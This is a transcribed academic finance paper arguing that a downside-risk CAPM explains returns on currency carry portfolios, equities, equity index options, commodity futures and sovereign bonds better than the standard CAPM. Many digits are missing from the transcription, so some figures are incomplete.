en
|
refinedweb
|
Conditional Risk Premia in Currency Markets and Other Asset Classes
- Bernard Carter
- 2 years ago
- Views:
Transcription
1 Conditional Risk Premia in Currency Markets and Other Asset Classes Martin Lettau Matteo Maggiori and Michael Weber May 3 Abstract rationalize the cross section of equity, equity index options, commodity, sovereign bond and currency returns, thus offering a unified risk view of these asset classes. In contrast, popular models that have been developed for a specific asset class fail to jointly price other asset classes. JEL classification: F3, F3, G, G Keywords: Carry Trade, Commodity Basis, Downside Risk, Equity Cross Section Haas School of Business, University of California at Berkeley, Berkeley, USA. Corresponding author: Stern School of Business, New York University, New York, USA. We thank George Constantinides, Eugene Fama, Kenneth French, Andrea Frazzini, Jens Jackwerth, Yoshio Nozawa, Lasse Pedersen, Alexi Savov, Fan Yang, and Adrien Verdelhan for sharing their data. We also thank for their useful comments Riccardo Colacito (discussant), Harald Hau (discussant), Ralph Koijen (discussant), Toby Moskowitz, Lasse Pedersen, Adrien Verdelhan (discussant) and seminar participants at Black Rock, UT Austin, UC Berkeley, University of Chicago Booth Junior Faculty Symposium, Duke University, University of Mannheim, University of Michigan, NBER Asset Pricing meeting, New York University, Princeton University, University of Southern California, AQR Insight Award, AEA, EFA, EEA and ESNAW, and SFS Finance Cavalcade meetings. Financial support from the Clausen Center and the Coleman Fung Center at UC Berkeley are gratefully acknowledged. Maggiori also thanks the International Economics Section, Department of Economics, Princeton University for hospitality during part of the research process for this paper. This paper was awarded the 3 AQR Insight Award.
2 Foreign exchange is a potentially risky investment and the debate on whether currency returns can be explained by their association with risk factors remains ongoing. We find that the cross section of currency returns can be explained by a risk model where investors are concerned about downside risk. High yield currencies earn higher excess returns than low yield currencies because their co-movement with aggregate market returns is stronger conditional on bad market returns than it is conditional on good market returns. We find that this feature of the data is characteristic not only of currencies but also of equities, commodities and sovereign bonds, thus providing a unified risk view of these markets. The carry trade in foreign exchange consists of investing in high yield currencies while funding the trade in low yield currencies. This trading strategy has historically yielded positive returns because returns on high yield currencies are higher than returns on low yield currencies. A number of explanations for this cross-sectional dispersion have been advanced in the literature, varying from risk based to behavioral. We provide a risk-based explanation by showing that the downside risk capital asset pricing model (DR-CAPM) prices the cross section of currency returns. We follow Ang, Chen, and Xing (6), who study equity markets, by allowing both the market price of risk and the beta of currencies with the market to change conditional on the aggregate market return. Intuitively, the model captures the changes in correlation between the carry trade and the aggregate market returns: the carry trade is more correlated with the market during market downturns than it is during upturns. Correctly capturing the variations in betas and prices of risk is crucial to the empirical performance of the DR-CAPM. It also clarifies why the unconditional CAPM does not explain the cross section of currency returns. While high yield currencies have higher betas than lower yield currencies, the difference in betas is too small to account for the observed spread in currency returns. We extend our results by testing the performance of the DR-CAPM jointly on currencies, various equity portflolios, equity index options, commodities and sovereign bonds. The variations in betas and prices of risk in the DR-CAPM can jointly rationalize the cross-sectional returns of all of these asset classes. This contrasts with the inability of a number of asset-class-specific models to price asset classes other than the one for which they have been built. The economic intuition behind our results is summarized in Figure. Across different asset classes such as currencies, commodities, and equities, assets that have higher exposure to downside risk, that is assets that have a higher downside beta (β ), earn higher excess returns even when
3 controlling for their CAPM beta (β). The top panel of Figure highlights this pattern in the data by plotting realized average excess returns versus the corresponding asset loading on downside risk (β β). The positive relationship between expected returns and downside risk is the crucial pattern behind the more formal econometric analysis of this paper. In contrast, the bottom panel of Figure shows why the CAPM cannot rationalize the returns of these asset classes. Within each asset class there is little dispersion in betas but a larger dispersion in realized returns. Across asset classes CAPM captures, at best, the average return of each asset class, but no strong systematic relationship appears. We compare the DR-CAPM with models based on principal component analysis (PCA) both within and across asset classes. Within each asset class the DR-CAPM captures the cross-sectional dispersion in returns summarized by the most important principal components. Across asset classes the DR-CAPM continues to capture expected returns with only two fundamental factors, while a PCA-based model requires as many as eight factors to generate similar explanatory power. This paper contributes to two strands of literature: the international finance literature on exchange rates and currency returns and the asset pricing literature on the joint cross section of returns of multiple asset classes. Among a vast international finance literature, Lustig and Verdelhan (7) provide an explanation for the cross section of currency returns based on the Durable Consumption CAPM (DC-CAPM). Burnside (b) and Lustig and Verdelhan () discuss the association of currency returns with consumption growth. Burnside, Eichenbaum, Kleshchelski, and Rebelo (), Burnside, Eichenbaum, and Rebelo (, 9), Burnside, Han, Hirshleifer, and Wang () focus on explanations of the carry trade such as investor overconfidence and peso problems. Lustig, Roussanov, and Verdelhan () (LRV) provide a model that employs the principal component analysis of currency returns. They show that currencies that load more heavily on the first two principal components, approximated by the returns on a dollar and carry trade portfolio respectively, earn higher excess returns on average. Menkhoff, Sarno, Schmeling, and Schrimpf () link the carry trade factor to exchange rate volatility. Our contribution to this literature is to provide an explanation of currency returns based on the conditional association of currency returns with a traditional risk factor, the market return. We not only reconcile our findings with the more statistical factors used in the literature, but also show that currencies are affected by the same aggregate risk that drives expected returns in other assets classes such as equities and commodities. See Sections I-II for the precise definition and estimation procedure of β and β.
4 A nascent literature is exploring the joint cross section of returns in multiple asset classes. Cochrane () emphasized this research agenda, which aims to reconcile the discount factors in different asset classes. In his American Finance Association presidential address he ponders: What is the factor structure of time-varying expected returns? Expected returns vary over time. How correlated is such variation across assets and asset classes? How can we best express that correlation as factor structure? [...] This empirical project has just begun, [...] but these are the vital questions. In recent and ongoing research Asness, Moskowitz, and Pedersen (), Frazzini and Pedersen (), Koijen, Moskowitz, Pedersen, and Vrugt () document that a number of cross-sectional phenomena such as value, carry, momentum, and the slope of the unconditional- CAPM-based capital market line that were previously only documented for specific asset classes are actually pervasive across multiple asset classes. We contribute to this literature by showing that the DR-CAPM can jointly reconcile the cross-sectional dispersion in returns across multiple asset classes. We also explore the factor structure by comparing the model to several PCA-based models. We find that PCA-based models tailored to a specific asset class are unable to price other asset classes, and that a PCA model based on the joint cross-section of multiple asset classes overestimates the number of risk factors. We view our results as a step in the research agenda emphasized by Cochrane (). We stress that the purpose of this paper is not to suggest that the DR-CAPM is the true model of all asset prices, nor is it to discourage the use of PCA to summarize patterns in asset returns. The purpose of this paper is to verify how much of the cross sectional variation in returns across asset classes can be rationalized by the association of returns, both unconditionally and conditionally, with a traditional risk factor, the market return. For this purpose and for completeness, we also report in Section V.E. a number of test assets the returns of which the DR-CAPM does not rationalize. In a separate online appendix we provide a number of details, robustness checks, and extensions of our results that are omitted in the main body of the paper, including a comparison of the DR-CAPM with PCA and co-skewness models. I Carry Trade, Cross-Sectional and Market Returns We follow Ang et al. (6) in allowing a differentiation in unconditional and downside risk. This captures the idea that assets that have a higher beta with market returns conditional on 3
5 low realization of the market return are particularly risky. The economic intuition underlying downside risk is simple: agents not only require a premium for securities the more their returns covary with the market return, but also, and even more so, when securities covary more with market returns conditional on low market returns. Markowitz (99) was among the first to recognize the importance of downside risk, formalized in his semi-variance, in addition to his more canonical expected-return-variance framework. While Ang et al. (6) motivate the above insight using the disappointment aversion model of Gul (99) further extended by Routledge and Zin (), a variety of models are potentially consistent with our findings. 3 We stress that our contribution is to highlight a previously unknown pattern: the dependance of expected returns on downside-risk across multiple asset classes. The previous literature had largely concluded that these asset classes had independent factor structures. The purpose of this paper is to systematical document this novel empirical pattern across a number of important cross sections and asset classes and we leave it to future work to provide specific theoretical models. To capture the relative importance of downside risk we propose that expected returns follow: Err i s β i λ ` pβ i β i qλ β i covpr i, r m q varpr m q, β i covpr i, r m r m ă δq varpr m r m ă δq, i,..., N, () where r i is the log excess return of asset i over the risk-free rate, r m is the log market excess return, β i and β i are the unconditional and downside beta defined by an exogenous threshold (δ) for the market return, and λ and λ are the unconditional and downside prices of risk, respectively. This empirical framework is flexible in allowing variations both in the quantity and the price of risk while maintaining a parsimonious parametrization with a single threshold δ. Note that the model reduces to CAPM in the absence of differential pricing of downside risk from unconditional market risk: λ ; or if the downside beta equals the CAPM beta: β i β i. As in the case of CAPM, the model also restricts the unconditional price of risk to equal the expected market excess return: Err m s λ, () Markowitz (99)[Ch. 9] notes that variance is superior with respect to (computational) cost, (analytical) convenience, and familiarity. (However), analyses based on semi-variance tend to produce better portfolios than those based on variance. 3 A variety of other asymmetrical CAPM models have been derived, for example: Leland (999) and Harvey and Siddique ().
6 because both the unconditional and downside beta of the market with itself are equal to. To clarify the terminology used in this paper, notice that we employ the concept of conditionality in the context of realizations of states of the world: market return above or below a threshold. A part of the asset pricing literature has instead applied similar terminology in the context of time variation of expected returns and return predictability tests. We stress that while we do not allow for time variation in the betas or the prices of risk, but only for variation across realized states of the world, our empirical methodology is consistent with some predictability in expected returns. Since we test our model on sorted portfolios that capture a characteristic associated with expected returns, for example the interest rate differential, we allow for predictability generated by variation over time in this characteristic. Cochrane () notes the similarity between testing the model on sorted portfolios and testing the model on unsorted assets while allowing for time variation in instruments that proxy for managed portfolios. Our procedure, however, does not allow variation in expected returns through time for a fixed characteristic. For example, we capture the fact that the expected return for a specific currency pair varies through time as the corresponding interest rate differential varies, but we do not allow for the expected return of a specific currency pair to vary through time given a constant interest rate differential. Lustig et al. () similarly allow predictability only through variation in the interest rate differential. Finally, our model specification is similar to the one tested by Ang et al. (6) on equity portfolios. While the present specification has the convenience of both nesting CAPM and reducing the number of estimated coefficients in the cross-sectional regression to the price of downside risk λ, we report in the appendix the estimates for the specification in Ang et al. (6) for our benchmark test assets. A. Data We use the bilateral currency returns dataset in Maggiori (); details of the data are included in the online appendix and in the original reference. The data are monthly, from January 97 to March, and cover 3 currencies. We follow Lustig and Verdelhan (7) in defining a cross It is in principle possible to allow both the concept of conditionality used in this paper and the time variation in betas and prices of risk to co-exist within the same model. In the present context, this could be achieved by estimating time varying betas and lambdas. Since this would require extracting additional information from a potentially limited number of observations for the downstate, we opted to impose constant betas and lambdas through time. While we do not disregard the possibility of time varying parameters, we view our model choice as conservative given the available data and stress that this restriction is routinely imposed on asset pricing models especially when testing them on sorted portfolios.
7 section of currency returns based on their interest rate. We sort currencies into 6 portfolios, in ascending order of their respective interest rates. Since the dataset includes currencies for which the corresponding country has undergone periods of extremely high inflation and consequently high nominal interest rates, we split the sixth portfolio into two baskets: 6A and 6B. Portfolio 6B includes currencies that belong to portfolio 6 and that have annualized inflation at least % higher than US inflation in the same month. We also use an alternative sorting that only includes developed countries currencies. 6 In this case we sort the currencies into rather than 6 baskets, to take into account the overall reduced number of currencies. We calculate one-month real-dollar bilateral log excess returns r t` as the sum of the interest differential and the rate of exchange rate depreciation of each currency with the US dollar: r t` i t i t s t`, where i and i are the foreign and US interest rate, and s t is log spot exchange rate expressed in foreign currency per US dollar. Figure shows that the sorting produces a monotonic increase in returns from portfolios to 6. Further descriptive statistics are reported in Table. Portfolios 6A and 6B highlight the very different behavior of high inflation currencies. The standard deviation of returns for portfolio 6B is almost double that of all other baskets. Bansal and Dahlquist () note that the uncovered interest parity condition cannot be rejected for these currencies. These findings and the general concern about the effective tradability of these currencies during periods of economic turmoil lead us to present our benchmark results using only basket 6A and to provide robustness checks including both basket 6 and 6B in the online appendix. For our benchmark results on the cross section of equity returns we use the 6 Fama & French portfolios sorted on size and book-to-market for the period from January 97 to March. In additional results we also test our model on the cross section of industry-sorted equity portfolios by Fama & French for the period from January 97 to March, on the CAPM-beta sorted equity portfolios of Frazzini and Pedersen () for the period from January 97 to March, and on the equity index option returns series by Constantinides, Jackwerth, and Savov (3) for We view our results excluding the high inflation currencies as conservative since these noisy observations are eliminated. Our results are robust to different threshold levels or to the inclusion of all the currencies in the 6th portfolio. The inflation data for all countries is from the IMF International Financial Statistics. 6 A country is considered developed if it is included in the MSCI World Equity Index. 6
8 the period from April 96 to March. For the cross section of commodity returns we use the commodity-futures portfolios sorted by the commodity basis for the period from January 97 to December by Yang (). For the cross section of sovereign bonds we use the 6 sovereign-bond portfolios sorted by the probability of default and bond beta for the period from January 99 to March by Borri and Verdelhan (). For the market return we use the value-weighted CRSP US equity market log excess return for the period January 97 to March. We use a broad US equity market return as the market return in our benchmark results not only because it is the most commonly used return to test CAPM-like asset pricing models, but also to conservatively avoid increasing the covariances between test assets and pricing factors by including our other test assets, such as currencies and commodities, in our market index. Nonetheless, in robustness checks included in the appendix we repeat our benchmark analysis using the MSCI World Market Equity Index returns and our own market index built by merging all our test assets in a single index. Tables and 3 provide summary statistics for the equity, equity index options, commodity futures and sovereign bond portfolios returns. In Table, Panel A highlights the pattern that small and value stocks have higher returns; Panel B highlights that futures on commodities that have low basis have higher returns; Panel C highlights that sovereign bonds have higher returns whenever they have lower credit rating and/or higher CAPM beta. In Table 3, Panel A highlights that equities that have high preformation CAPM-beta tend to earn (somewhat) lower returns; Panel B creates a cross section by sorting equities on their industry classification; Panels C and D show that portfolios that are short equity index put options and long call options earn higher returns the shorter the further the options are out of the money and the shorter (longer) the maturity for puts (calls). B. Conditional Correlations The central insight underlying our work is that the currency carry trade, as well as other cross-sectional strategies, is more highly correlated with aggregate returns conditional on low aggregate returns than it is conditional on high aggregate returns. This insight is supported by a growing empirical literature including Brunnermeier, Nagel, and Pedersen (), Burnside (a), Lustig and Verdelhan (), Christiansen, Ranaldo, and Soederlind (), Mueller, Stathopoulos, and Vedolin () all of which find a state dependent correlation. In ongoing work, Caballero and Doyle (3) and Dobrynskaya (3) highlight the strong correlation of the 7
9 carry trade with market risk during market downturns. Our paper differs from all previous studies both by providing systematic evidence over a longer time period and larger sample of this state dependent correlation and by relating the resulting downside risk to that observed in other asset classes such as equities, equity index options, commodities, and sovereign portfolios. We define the downstate to be months where the contemporaneous market return is more than one standard deviation below its sample average. A one standard deviation event is a reasonable compromise between a sufficiently low threshold to trigger concerns about downside risk and a sufficiently high threshold to have a large number of downstate observations in the sample. Our definition assigns monthly observations to the downstate, out of 3 total observations in our sample. For robustness we test our model with different threshold levels as well as a finer division of the state space into three rather than two states. 7 Table shows that the carry trade is unconditionally positively correlated with market returns. The correlation is. and statistically significant for our benchmark sample and robust to the exclusion of emerging markets or to various thresholds of inflation for the basket 6B. The table also shows that most of the unconditional correlation is due to the downstate: conditional on the downstate the correlation increases to.33, while it is only.3 in the upstate. Figure 3 highlights this characteristic of the data by plotting the kernel-smoothed conditional correlation between the carry trade and the market returns. The top panel shows that the correlation of high yield currencies with the market returns is a decreasing function of market returns. The opposite is true for low yield currencies in the middle panel. The bottom panel highlights that our results are not sensitive to the exact choice of threshold. II Econometric Model We estimate the model in () with the two-stage procedure of Fama and MacBeth (973). In our model the first stage consists of two time-series regressions, one for the entire time series and one for the downstate observations. These regressions produce point estimates for the unconditional and downstate betas, ˆβ and ˆβ, which are then used as explanatory variables in the second stage. The second-stage regression is a cross-sectional regression of the average return of the assets on their unconditional and downstate betas. In our estimation we restrict, following the theory section above, the market price of risk to equal the sample average of the market excess-return. 7 Thresholds of the sample average minus. or. standard deviations assign observations and 7 observations to the downstate, respectively. The upstate includes all observations that are not included in the downstate.
10 Therefore, in the second-stage regression we estimate a single parameter: the downside price of risk λ. Formally, the first-stage regressions are: r it a i ` β i r mt ` ɛ P T, (3) r it a i ` β i r mt ` ɛ it, whenever r mt ď r m σ rm, () where r m and σ rm are the sample average and standard deviation of the market excess return, respectively. The second-stage regression is given by: r i ˆβ i r m ` p ˆβ i ˆβ i qλ ` α i, i,..., N, () where r i and r m are the average excess returns of the test assets and the market excess-return, respectively and α i are pricing errors. Notice that by not including a constant in the second-stage regression we are imposing that an asset with zero beta with the risk factors has a zero excess return. 9 While restricting the model so that the market return is exactly priced reduces the number of coefficients to be estimated in the cross-sectional regression, it does not imply that the sample average market return is estimated without noise. The average monthly excess return of the value-weighted CRSP US equity market for the sample period from January 97 to March is.39% with a standard error of.3%. This corresponds to an annualized log-excess return for the market of.6%, an estimate in the range of the values usually assumed to calibrate the equity premium. To make clear that the unconditional market price of risk is imposed rather than estimated in our cross-sectional regressions, we report its estimate with a star and do not report its standard error in all tables of the paper. While restricting the market to be exactly priced is regarded as a conservative procedure, we report in the appendix our benchmark results without imposing this restriction and note that in that case we recover an estimate of the price of unconditional market risk of.9 that is similar to the sample average estimate of.39 imposed in the rest of the paper. 9 In unreported results we estimated the model including a constant in the cross-sectional regression and verified that the constant is not statistically significant. When estimating the model on sub-periods, we always impose that the average market return over that sub-period is priced exactly by correspondingly adjusting the value of λ. 9
11 III Empirical Results A. Risk Premia: Currency We find that while the CAPM shows that currency returns are associated with market risk, it cannot explain the cross section of currency returns because the CAPM beta is not sufficient to explain the cross sectional dispersion in returns. The left panel of Figure shows that the increase in CAPM beta going from the low yield portfolio (portfolio ) to the high yield portfolio (portfolio 6) is small compared to the increase in average returns for these portfolios. As it will shortly become evident, once the market price of risk of CAPM is pinned down by the average market excess return, CAPM fails to price these currency portfolios. The middle panel of Figure shows that average currency returns are also strongly related to the downstate beta. While this finding supports the importance of downside risk for currency returns, it is not per se evidence of a failure of CAPM because currencies that have a higher downstate beta do have a higher CAPM beta. However, the right panel of Figure shows that the relative beta, the difference between downstate and unconditional beta, is also associated with contemporaneous returns. Currencies that have higher downstate than unconditional beta are on average riskier and earn higher excess returns. We show in our benchmark regressions that this state dependency is not fully captured by the CAPM beta. Figure and Table illustrate both the failure of CAPM and the performance of the DR- CAPM. The top panels of Figure present the results employing all currencies, the bottom panels present the results employing only currencies of developed countries. Since higher yield currencies have higher CAPM beta, they earn a higher return on average. However, the CAPM beta does not fully capture the risk-return tradeoff: the spread in betas is too small to account for the spread in currency returns. The failure is evident in the first column of Table, where CAPM cannot jointly price the market return and the cross section of currency returns producing a R of only %. Correspondingly, the left panels of Figure show that CAPM predicts almost identical returns for all currency portfolios. In contrast, the DR-CAPM explains the cross section of currency returns. In the second column of Table, the DR-CAPM explains 79% of the cross-sectional variation in mean returns even after imposing the restriction that the market portfolio (included as a test asset) is exactly We assess the explanatory power of the model using a cross sectional R defined as: R ˆα ˆαrN V arprqs, where ˆα is the vector of pricing errors, V arprq is the variance of the vector of test assets mean returns, and N is the number of test assets.
12 priced. The right quadrants of Figure correspondingly show that the test assets lie close to the degree line. The estimated price of downside risk is positive (.) and statistically significant. 3. The model fits the returns of portfolios to 6A with small pricing errors. The absolute pricing error is on average.7% (in terms of monthly excess returns) across these portfolios. Portfolio, which contains the low yield currencies, is priced with the biggest pricing error,.%. We also report the χ test that all pricing errors in the cross-sectional regression are jointly zero. While both the CAPM and the DR-CAPM are formally rejected with p-values of % and.% respectively, we stress that the DR-CAPM produces a root mean square pricing error (RMSPE) that is % smaller than that of CAPM. Potential sources of concern about the reliability of our currency returns are sovereign default and international capital restrictions. To alleviate these concerns, we test the DR-CAPM on a subsample of developed countries currencies. The results for this subsample of countries are also reported in Figure and Table and show that the model performs equally well on these portfolios. The price of downside risk is.3 and is consistent with the. estimate obtained on the full sample and the R increases to %. We confirm on this subsample the pattern of small DR-CAPM pricing errors for all portfolios except portfolio. The null hypothesis of zero joint pricing errors cannot be rejected at the % confidence level with a p-value of the χ test of %. The RMSPE of.% is almost % smaller than the one produced by CAPM on the same test assets. B. Risk Premia: Other Asset Classes The conditional association of asset returns and the market portfolio and the variation in prices of risk is not unique to currencies and is, in fact, shared by other asset classes. Providing a unified risk-based treatment of expected returns across asset classes is both informative from a theoretical This procedure assumes that the market risk premium is measured without error but has the benefit of reducing the number of free parameters. Including the market return as a test asset and estimating the risk premium freely does not alter our results since the estimated market risk premium is close to the average market excess return, see the online appendix for details. 3 The Fama MacBeth procedure does not automatically correct the second-stage regression standard errors for estimated regressors from the first-stage. Given our separate first-stage regressions for the full sample and the downstate, the Shanken correction (Shanken (99)) is not immediately applicable here. In the robustness section of this paper and in the appendix, we provide a number of checks of the standard errors to minimize concerns about their reliability. Note that the pricing errors here and in all subsequent tables and references in the text are expressed in monthly percentage excess returns, while the figures are annualized percentage excess returns. The pricing errors are defined as the difference between the actual and model-predicted excess return, so that a positive price error corresponds to an under prediction of the return by the model. The test is under the null hypothesis of zero joint pricing errors, therefore the model is not rejected at the % confidence level if the p-value statistic is higher than %.
13 perspective and an important check of the empirical performance of theoretical models. Figure 6 shows that equity, commodity, and sovereign bond portfolios expected returns are positively related to these assets relative downside betas. In all three asset classes, assets that are more strongly associated with market returns conditional on the downstate than unconditionally have higher average excess returns. This conditional variation which is not captured by CAPM is the central mechanism that underlies the performance of the DR-CAPM across asset classes. We investigate next whether the DR-CAPM can jointly explain the cross section of currency and equity returns. We add the 6 Fama & French portfolios sorted on book-to-market and size to the currency and market portfolios as test assets. Figure 7 and Table 6 show that the DR-CAPM jointly explains these returns. The estimated price of downside risk is consistent across asset classes but the estimate of. is lower than that obtained on currencies alone (.). 6 The model explains 7% of the observed variation in mean returns, a noticeable increase over the % explained by CAPM. Figure 7 shows that the largest pricing errors occur for the small-growth equity portfolio (portfolio 7) in addition to the low-yield currency portfolio (portfolio ). The average absolute pricing error on all other portfolios is.%, while the pricing errors on the small-growth equity portfolio and the low-yield currency portfolios are -.% and -.7%, respectively. Section V.B. provides further details about the pricing of the small-growth equity portfolio. Both CAPM and the DR-CAPM are statistically rejected with p-values of the χ test of % and.3% respectively, but the DR-CAPM produces a RMSPE two thirds smaller than CAPM. A close analog to the currency carry trade is the basis trade in commodity markets. The basis is the difference between the futures price and the spot price of a commodity. Among others, Yang () shows that commodities with a lower basis earn higher expected returns (see Table Panel B). 7 We extend our results by adding the commodity portfolios to the currency and equity portfolios. Figure and Table 7 show that the same economic phenomenon, the conditional variation of the quantity and price of market risk, underlies the variation in expected returns in commodity markets. The estimated price of downside risk (.) is essentially unchanged after the addition of the commodity portfolios to the currency and equity portfolios studied above and is statistically significant. The model explains 7% of the cross sectional variation in returns across these asset classes compared to an adjusted R of -7% for CAPM. The biggest pricing error occurs for the high-basis commodity portfolio (portfolio ) in addition to the low-yield 6 If the small-growth equity portfolio is excluded as a test asset, the estimated price of risk increases to.7. Section V.B. provides a detailed discussion of the returns and pricing of the small-growth equity portfolio. 7 Also see Gorton, Hayashi, and Rouwenhorst (3).
14 currency portfolio (portfolio ) and the small-growth equity portfolio (portfolio ). The pricing errors for these three portfolios are -.%, -.%, and -.6%, respectively. The average absolute pricing error of all other portfolios included as test assets is.7%. While both CAPM and the DR-CAPM are again statistically rejected, the DR-CAPM produces a RMSPE % smaller than CAPM. We investigate next whether sovereign bonds are priced by the DR-CAPM. We use the cross-sectional sorting of sovereign bonds according to default probability and market beta in Borri and Verdelhan (). Figure 9 and Table confirm yet again the ability of the DR-CAPM to price multiple asset classes. An important caveat in this case is that the data of Borri and Verdelhan () are only available over a relatively short sample period (January 99 to March ), thus limiting the number of observations, particularly for our downstate. The shorter sample produces noisier estimates of the prices of risk and different point estimates overall from our full sample. The sample limitations impose caution in interpreting the positive performance of our model on sovereign bonds. Consequently, we exclude these portfolios from the analysis in the rest of the paper. In our benchmark results for equity markets we employ the Fama & French book-to-market and size sorted portfolios because they are among the most commonly tested equity cross sections. In addition, we document here that the DR-CAPM can rationalize a number of other important cross-sections in equity markets: the CAPM-beta sorted cross section, the industry sorted cross section, and the equity index options cross section. In Figure and Table 9 we analyze the performance of the DR-CAPM for the cross section of CAPM-beta sorted equity portfolios of Frazzini and Pedersen () as well as for their Betting Against Beta (BAB) factor for equity markets. The DR-CAPM has higher explanatory power than CAPM for the joint cross section of currency, commodity and beta-sorted equity returns with estimates of the market price of downside risk consistent with those estimated on other cross sections. Notably the BAB factor has a.3% pricing error under CAPM that is almost seven times bigger than the.% pricing error under the DR-CAPM. We have documented that for the cross-section of currencies, commodities and Fama & French portfolios CAPM under-predicts the returns and the downside risk factor is able to fill the gap between the CAPM predicted returns and the actual returns in the data. Interestingly, for the beta-sorted portfolios CAPM over-predicts the returns of the high-beta portfolios with respect to the low beta portfolios; a fact that Frazzini and Pedersen () refer to as a too flat Capital By construction the BAB factor is long low beta equities and short high beta equities with the position adjusted to be market neutral (zero CAPM beta). See original reference for details. 3
15 Market Line in the data. The DR-CAPM in part corrects the over-prediction of CAPM because high-beta equities have a relatively lower downside risk exposure compared to low-beta equities. For example, consider the BAB factor in the top panels of Figure : by construction it has a CAPM beta close to zero, estimated at -. and not statistically significant, and its riskiness is entirely captured by its downside beta, estimated at. and statistically significant (see Panel A Table ). 9 Therefore, for the BAB portfolio CAPM implies an annualized expected excess return of -.9%, while the DR-CAPM predicts a return of.3% which is substantially closer to the actual average return of.3%. This result is consistent with the analysis in Frazzini and Pedersen () who note that the BAB factor performs particularly poorly when the overall market return is low, thus naturally generating a downside risk exposure. In Figure and Table we test the DR-CAPM on the industry-sorted equity portfolios of Fama & French. We consistently find that the DR-CAPM can rationalize these test assets with a price of downside risk, here estimated at., similar to that estimated on other crosssections. The model explains 7% of the joint variation in returns of currencies and equity industry portfolios with a substantial increase over the 3% explained by CAPM. Finally, we investigate whether the DR-CAPM can rationalize option returns. Options, and in particular portfolios short in put options written on the market index, are naturally exposed to downside risk. We test the model on the cross-section of equity index (S&P ) option returns in Constantinides et al. (3). Figure and Table present the result based on the cross-section of both calls and puts, while Figure 3 and Table focus only on the puts. The DR-CAPM not only captures % of the variation in expected returns across option portfolios, but can also jointly rationalize this variation together with the returns of currencies and commodities (R of 7%). This further confirms that the estimated value of the price of downside risk (λ ) is consistent across asset classes even when considering optionality features. In contrast CAPM cannot rationalize the option returns. By construction the option portfolios have a CAPM beta close to (see Panel A Table ), thus generating almost identical CAPM-predicted returns for all portfolios, but have substantial variation in realized average 9 Frazzini and Pedersen () build the BAB factor to have zero CAPM beta. Small differences in the beta occur here because of the use of a different index to proxy for the CAPM market portfolio as well as a different time period. The CAPM prediction is obtained by multiplying the beta times the market price of risk (-.*.3*=-.9). Similarly the DR-CAPM prediction is obtained by summing to the CAPM prediction the downside risk correction of pβ βqλ p. `.q.6.9. The cross section includes portfolios of calls (9) and puts (9) sorted on maturity and in-the-moneyness. See original source for portfolio construction details.
16 excess returns (close to a % range). Almost all option portfolios are accurately priced with small pricing errors with the exception of the 3-day maturity and 9 moneyness put portfolio. 3 Constantinides et al. (3) report that this portfolio is hard to price even for most option-market-tailored asset pricing models and consider the possibility that liquidity issues might affect its pricing. We have shown that the DR-CAPM can rationalize a number of important asset classes and that the estimate of the price of risk remains stable across different estimations. While this reduces concerns about the reliability of estimates of λ, further quantitative implications of our empirical framework, for example about the magnitude of λ, cannot be drawn without imposing a more structural theory on the model. We leave the development of a structural theory to future work and only note here that λ is consistently estimated across a number of different cross sections, asset classes and patterns in expected returns. For completeness we also report in Section V.E. a number of alternative test assets whose return factor structure cannot be rationalized by the DR-CAPM. IV Robustness An important verification of our results is to confirm the association of currency returns with downside market risk. In Panel A of Table 3 we provide the first-stage estimates of the unconditional CAPM betas and the downstate betas for the six currency portfolios. The CAPM betas are increasing from portfolio to 6 and the spread in betas between the first and last portfolio is statistically different from zero. The increase in betas, however, is small; the beta of the first portfolio is.3 while the beta of the last portfolio is.. We provide both OLS and bootstrapped standard errors. The downstate betas highlight the central mechanism of the DR-CAPM: conditional on below-threshold market returns, high yield currencies (portfolio 6A) are more strongly related to market risk than low yield currencies (portfolio ). In fact, we find that while the downside beta of portfolio 6A (.3) is larger than its unconditional beta (.), Recall that Constantinides et al. (3) build the option portfolios by imposing that under the Black and Scholes assumptions they would have CAPM beta of with the S&P index. The variation in CAPM betas reported here with respect to the original source is due to the use of the value-weighted CRSP as a market index as well as a different time period for the sample. 3 This is the shortest maturity and furthest out of the money portfolio in the sample. Ultimately, the quantitative importance of downside risk can also be linked to the rare disasters model of Barro (6). Farhi and Gabaix () develop a model of exchange rates in the presence of rare disasters and Farhi, Fraiberger, Gabaix, Ranciere, and Verdelhan () and Jurek () evaluate rare disasters in currency markets in an option framework. We employ a smoothed bootstrap scheme consisting of resampling empirical residuals and adding zero centered normally distributed noise using, iterations.
17 the opposite is true for portfolio with a downside beta of. and an unconditional beta of.3. Splitting the sample into the downstate picks up the conditional variation in currencies association with market risk, but also reduces the variation available in each subsample to estimate the betas. Therefore, the standard errors of the first-stage regressions that estimate downstate betas are wider than those of the corresponding regressions for unconditional betas. We perform a number of robustness checks of our first-stage estimates and their impact on the second-stage estimates. We perform two bootstrap tests to check the robustness of the main driver of our results: the different conditional association of high yield and low yield currencies with the market excessreturn. We first test whether high yield currencies are more associated with market risk than low yield currencies conditional on the downstate under the null hypothesis that β 6A β. We then test whether the different loading on risk of high and low yield currencies varies across states under the null hypothesis that pβ 6A β q pβ 6A β q. Figure shows that both nulls are strongly rejected with p-values of.% and.%, respectively, thus yielding statistical support for our main economic mechanism. A second robustness check is to mitigate the concern that our second-stage regression employs potentially weak estimated regressors from the first stage. Table 3 reports the first-stage estimates for the 6 Fama & French equity portfolios. Since these equity portfolios have a strong association with the overall equity market, the betas are very precisely estimated even for the downstate. We then use the prices of risk estimated using only these equity portfolios to fit the cross section of currencies. Table reports that the DR-CAPM can still explain 67% of the observed variation in currency returns and 7% of the variation in currency and equity returns. The estimated price of downside risk is.7, statistically significant, and consistent with the estimate of. obtained on the joint sample of currencies and equities. 6 In Table 6 we verify that our results are not altered by reasonable variations in the threshold for the downstate. We vary our benchmark threshold for the market return of standard deviation below its sample mean to. and. standard deviations. In both cases we observe a consistent performance of the model. Finally, we verify the sensitivity of our results to different thresholds for excluding currencies with high inflation. We vary the inflation threshold from our benchmark of % above the annualized inflation of the US to % and %. Table 7 shows that the lower threshold produces 6 This robustness check also minimizes concerns about the reliability of second-stage Fama-Macbeth standard errors due to the presence of estimated regressors. Our results are little changed when employing first stage estimates that are very accurate. 6
